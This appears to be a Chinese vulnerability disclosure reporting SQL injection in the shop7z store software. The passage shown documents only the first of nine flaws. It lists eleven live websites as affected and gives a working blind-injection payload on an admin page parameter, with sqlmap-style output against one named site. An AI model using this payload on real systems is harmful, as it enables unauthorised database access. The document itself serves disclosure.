shop7z九处SQL注入打包

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: shop7z九处SQL注入打包 提交好几次了 虽然很累 不过想到审核的哥们要审核那么多洞 自己的累确实不算什么 ### 详细说明: 案例: http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn #1 漏洞文件:/admin/dingdan_sendnot.asp 问题参数:id【POST下】 TEST:http://www.125309.com/admin/dingdan_sendnot.asp ``` id=1 ``` ``` Place: POST Parameter: id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: id=IIF(2159=2159,1,1/0) --- [19:37:57] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb' [19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_maste rdb' [19:37:57] [WARNING] running in a single-thread...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息